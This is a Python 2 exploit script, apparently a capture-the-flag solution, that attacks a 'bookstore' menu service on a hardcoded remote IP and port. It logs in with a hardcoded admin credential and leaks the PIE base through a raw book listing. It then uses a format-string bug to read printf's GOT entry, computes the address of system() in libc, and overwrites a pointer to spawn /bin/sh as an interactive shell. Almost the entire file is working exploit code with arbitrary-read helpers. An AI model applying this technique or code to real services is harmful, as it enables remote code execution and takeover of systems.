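import time
import socket
import sys
from struct import pack, unpack

from codez import *  # provides Remote (read/sendline/write/interactive)

# Python 2 exploit script (str is bytes throughout).
# Usage: python exploit.py l   -> local instance (127.0.0.1:1234, local libc offsets)
#        python exploit.py     -> remote target (offsets for the challenge's libc)
# Previously sys.argv[1] was read unconditionally and crashed with IndexError
# when no argument was given; now a missing argument means "remote".
LOCAL = len(sys.argv) > 1 and sys.argv[1] == 'l'


class Bookstore(Remote):
    """Driver for the bookstore service's text menu.

    Every method performs one menu interaction and consumes the prompt that
    follows it, so the connection is left at a known prompt for the next call.
    read()/sendline()/write()/interactive() come from Remote (codez); read(x)
    is assumed to return everything up to and including the delimiter x.
    """

    def login(self):
        """Authenticate as the admin user (the local build uses another name)."""
        self.read(':')
        self.sendline('xhelloadmin' if LOCAL else 'helloadmin')
        self.read(':')
        self.sendline('iulover!@#$')  # challenge-specific credential

    def cmd(self, n):
        """Select entry n of the main menu (waits for the '>' prompt)."""
        self.read('>')
        self.sendline(str(n))

    def add(self, n, d, t):
        """Menu 1: create a book with name n, description d and type t."""
        self.cmd(1)
        for field in (n, d):
            self.read(':')
            self.sendline(field)
        self.read(')')
        self.sendline(str(t))

    def modify(self, id):
        """Menu 2: open the edit submenu for book id (stops at its '!' banner)."""
        self.cmd(2)
        self.read(':')
        self.sendline(str(id))
        self.read('!')

    def back(self):
        """Leave the edit submenu (option 0)."""
        self.read('!')
        self.sendline('0')

    def modif_name(self, id, n):
        """Edit submenu 1: replace the name of book id with the raw bytes n.

        n is sent with write() rather than sendline(), presumably so that no
        newline is appended and the payload length/content is exact.
        """
        self.modify(id)
        self.sendline('1')
        self.read('\n')
        self.write(n)
        self.back()

    def modif_desc(self, id, d):
        """Edit submenu 2: replace the description of book id with d."""
        self.modify(id)
        self.sendline('2')
        self.read('\n')
        self.read('\n')
        self.write(d)
        self.read('!')
        self.back()

    def modif_info(self, id, n, d, stock=0, price=0, frees=0, av=0):
        """Edit submenu 3: set stock/price/frees/av, then name n and description d.

        Unlike modif_name, the name and description are sent with sendline().
        """
        self.modify(id)
        self.sendline('3')
        for prompt, value in ((':', stock), (':', price), (')', frees), (':', av)):
            self.read(prompt)
            self.sendline(str(value))
        for text in (n, d):
            self.read('\n')
            self.sendline(text)
            self.read('!')
        self.back()

    def modif_ship(self, id, ship):
        """Edit submenu 4: set the shipping option of book id."""
        self.modify(id)
        self.sendline('4')
        self.read(')')
        self.sendline(str(ship))
        self.back()

    def print_book(self, id):
        """Menu 3: return the service's dump of book id (everything before '=')."""
        self.cmd(3)
        self.read(':')
        self.sendline(str(id))
        self.read('\n')
        return self.read('=')[:-1]

    def list(self):  # name kept: callers use bs.list()
        """Menu 4: return the listing of all books (everything before '=')."""
        self.cmd(4)
        self.read('N')
        time.sleep(0.1)  # give the whole listing time to arrive before reading
        return self.read('=')[:-1]


if LOCAL:
    bs = Bookstore('127.0.0.1', 1234)
    printf_off = 0x4a0d0  # libc offsets of printf and system (local libc)
    system = 0x3b040
else:
    bs = Bookstore('54.65.210.251', 31337)
    system = 0x3e360      # libc offsets of printf and system (target's libc)
    printf_off = 0x4cbf0

## lets roll
bs.login()
bs.add('a', 'b', 0)
# stock/price are marker values (little-endian "AAAD" / "AAAA"); the listing
# is presumably dumped raw, so the bytes after the 'D' marker are what the
# service stores right after the stock field.
bs.modif_info(0, 'X' * 20, 'x', stock=0x44414141, price=0x41414141)
listing = bs.list()
listing = listing[listing.index('name'):]
leak = listing[listing.index('D') + 1:][:4]
if len(leak) != 4:
    # unpack('I') would raise struct.error here; say what actually went wrong
    raise SystemExit('[-] PIE leak truncated: %r' % leak)
# 0x9ad: offset of the leaked pointer's target within the PIE image (target-specific)
base = unpack('I', leak)[0] - 0x9ad
_printf_got = base + 0x400c
_printf_plt = base + 0x680
index = 13  # positional argument index used by the %N$s leak (found empirically)
print('[+] base %s' % hex(base))
print('[+] printf@got %s' % hex(_printf_got))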
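print('[+] printf@plt %s' % hex(_printf_plt))
print('[+] fmt index %s' % str(index))
time.sleep(0.1)

LEAK_START = '####'
LEAK_END = '|XX'
NAME_LEN = 0x1f4  # size of the pointer spray written into the name (multiple of 4)


def fmt_leak(addr):
    """Format string that prints the NUL-terminated string at addr.

    The 4-byte address follows the markers; the %N$s conversion dereferences
    the stack slot selected by `index`, which must be where this address lands.
    The address is last in the string, so a NUL byte inside it only truncates
    the address itself, not the conversion.
    """
    return LEAK_START + '%' + str(index) + '$s' + LEAK_END + pack('I', addr)


bs.modif_name(0, pack('I', _printf_plt) * (NAME_LEN // 4))  # // : 0x1f4/4 is a float on Python 3
bs.modif_info(0, fmt_leak(_printf_got), 'b')
bs.modif_ship(0, 1)
sys.stdout.flush()


def leaked_bytes(dump):
    """Return the bytes printed by the %s conversion inside a print_book dump.

    Raises ValueError when the start marker is missing (the format string was
    not evaluated), instead of an unexplained IndexError from the split.
    """
    if LEAK_START not in dump:
        raise ValueError('leak markers missing from output: %r' % dump[:64])
    return dump.split(LEAK_START, 1)[1].split(LEAK_END, 1)[0]


def one_read(addr):
    """Leak the NUL-terminated string at addr; a NUL at addr yields '\\x00'.

    Only the leaked bytes are returned (the previous version also returned the
    trailing marker and address bytes, which callers then mistook for data).
    """
    bs.modif_name(0, fmt_leak(addr))
    return leaked_bytes(bs.print_book(0)) or '\x00'


def arb_read(addr, s):
    """Read s bytes starting at addr with repeated %s leaks.

    %s stops at the first NUL, so each round yields the string at the current
    position (or one NUL byte) and the cursor advances by exactly that many
    bytes. The previous version stepped 4 bytes per round regardless of how
    much was obtained and dropped the tail when s was not a multiple of 4.
    A failed round returns what was gathered so far (best effort).
    """
    out = ''
    while len(out) < s:
        try:
            out += one_read(addr + len(out))
        except Exception as exc:  # best-effort: keep the partial read, but say why
            print('[-] arb_read stopped at %s: %s' % (hex(addr + len(out)), exc))
            break
    return out[:s]


printf_leak = leaked_bytes(bs.print_book(0))
if len(printf_leak) < 4:
    # %s stopped early: the GOT entry has a NUL among its low bytes, and
    # [:4] on the raw dump would have silently consumed the marker instead.
    raise SystemExit('[-] printf@got leak truncated (%d bytes)' % len(printf_leak))
printf = unpack('I', printf_leak[:4])[0]
libc = printf - printf_off
system += libc
print('[+] printf %s' % hex(printf))
print('[+] libc %s' % hex(libc))
print('[+] system %s' % hex(system))
sys.stdout.flush()

# Same sequence as for the leak, now with system and a command as the name
# ("#" comments out whatever follows the path when the string reaches system).
bs.modif_name(0, pack('I', system) * (NAME_LEN // 4))
bs.modif_info(0, '/bin/sh #\x00', 'b')
bs.modif_ship(0, 1)
bs.print_book(0)
bs.interactive()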